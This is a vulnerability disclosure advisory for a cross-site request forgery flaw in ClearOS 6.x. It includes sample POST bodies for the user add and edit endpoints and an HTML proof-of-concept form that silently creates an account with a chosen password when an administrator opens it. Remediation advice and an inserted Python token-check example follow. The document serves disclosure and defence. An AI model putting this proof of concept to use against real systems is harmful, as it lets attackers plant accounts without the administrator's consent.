Advisory ID: OS002
Product: ClearOS
Created by: Clear Foundation (http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)
Vulnerable Version(s): 6.X.X
Tested Version: 6.1.0 - 6.3.0
Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
Public Disclosure: Not yet
Vendor status: Notified
Vendor Answer: "We expect these to be resolved for the ClearOS 6.4.0 Beta 2 (due later this month)."
CVSS Base Score: 5.8
CVSS Temporal Score: 4.8
CVSS Environmental Score: 4.8
Researcher: Camilo Galdos, Security Consultant @ Open-sec (http://www.open-sec.com/)
Advisory Details:
Camilo Galdos, Security Consultant at Open-Sec, discovered a vulnerability in ClearOS which can be exploited to remotely add accounts to the ClearOS system by making the administrator access a link.
Vulnerability Description: Cross-Site Request Forgery (CSRF) in ClearOS:
90% of the forms in ClearOS and its modules do not use a token to verify that the form is actually being sent by the administrator or user of ClearOS.
Examples of URLs that can be used to exploit this vulnerability are:
https://127.0.0.1:81/app/users/edit/get
POST:
user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update
https://127.0.0.1:81/app/users/add
POST:
user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add
Exploit:
<html>
<head>
<title>CSRF ClearOS</title>
</head>
<body>
<h1>CSRF ClearOS ~ Open-Sec</h1>
<form name="lol" id="lol" class="theme-form" action="https://192.168.1.40:81/app/users/add" method="post" accept-charset="utf-8" autocomplete="off">
<input type="hidden" name="user_info[core][username]" value="Dedalo"/>
<input type="hidden" name="user_info[core][first_name]" value="Camilo"/>
<input type="hidden" name="user_info[core][last_name]" value="Galdos"/>
<input type="hidden" name="password" value="p455w0rd"/>
<input type="hidden" name="verify" value="p455w0rd"/>
<input type="submit" name="submit" value="Add"/>
</form>
</body>
</html>
Impact:
Administrators can be tricked into visiting a link, and when they do they automatically create a new user, edit a user, change a password, or perform any other action that is driven by a form, because almost no form carries a token for validation.
Solution:
To fix this kind of vulnerability (CSRF) you must put an anti-CSRF (synchronizer) token in every form to validate that the form is being sent from the specified module or page. OWASP has examples in different programming languages that you can use as a reference to patch this vulnerability:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
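The synchronizer-token check described above, written here as an added example in Python (it is not ClearOS code, which is PHP); the session dict, the `csrf_token` field name and the `/app/users/add` handler are assumptions, and the POST body is constructed from the advisory's own field names:

```python
import hmac
import secrets
from urllib.parse import parse_qs

SESSION_KEY = "csrf_token"  # assumed name of the server-side session slot


def issue_csrf_token(session):
    """Return the session's CSRF token, creating a random one on first use."""
    if SESSION_KEY not in session:
        session[SESSION_KEY] = secrets.token_hex(32)
    return session[SESSION_KEY]


def render_add_user_form(session, action="/app/users/add"):
    """Emit the user-add form with the token as a hidden field (the part the
    vulnerable ClearOS forms lack)."""
    token = issue_csrf_token(session)
    return (
        f'<form action="{action}" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}"/>'
        '<input type="text" name="user_info[core][username]"/>'
        '<input type="submit" name="submit" value="Add"/></form>'
    )


def handle_users_add(session, body):
    """Validate the token before acting on a urlencoded POST body such as the
    ones quoted in the advisory. Returns (http_status, message)."""
    post = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    expected = session.get(SESSION_KEY)
    supplied = post.get("csrf_token", "")
    # A cross-site page cannot read the victim's session token, so a forged
    # request cannot supply a matching value. Compare in constant time.
    if expected is None or not hmac.compare_digest(
        expected.encode(), supplied.encode()
    ):
        return 403, "CSRF token missing or invalid"
    username = post.get("user_info[core][username]", "")
    if not username:
        return 400, "username required"
    return 200, f"user {username} added"


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Constructed body in the advisory's format, with no token: rejected.
    forged = "user_info%5Bcore%5D%5Busername%5D=Dedalo&password=x&verify=x&submit=Add"
    print(handle_users_add(session, forged))
    print(handle_users_add(session, forged + "&csrf_token=" + token))
```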
Contact Information: For additional details, feel free to contact Camilo Galdos at cgaldos[at]open-sec.com
About Open-Sec:
Open-Sec is a Perú-based company focused on penetration testing and security incident investigation services. With customers in Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.
Disclaimer:
The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible.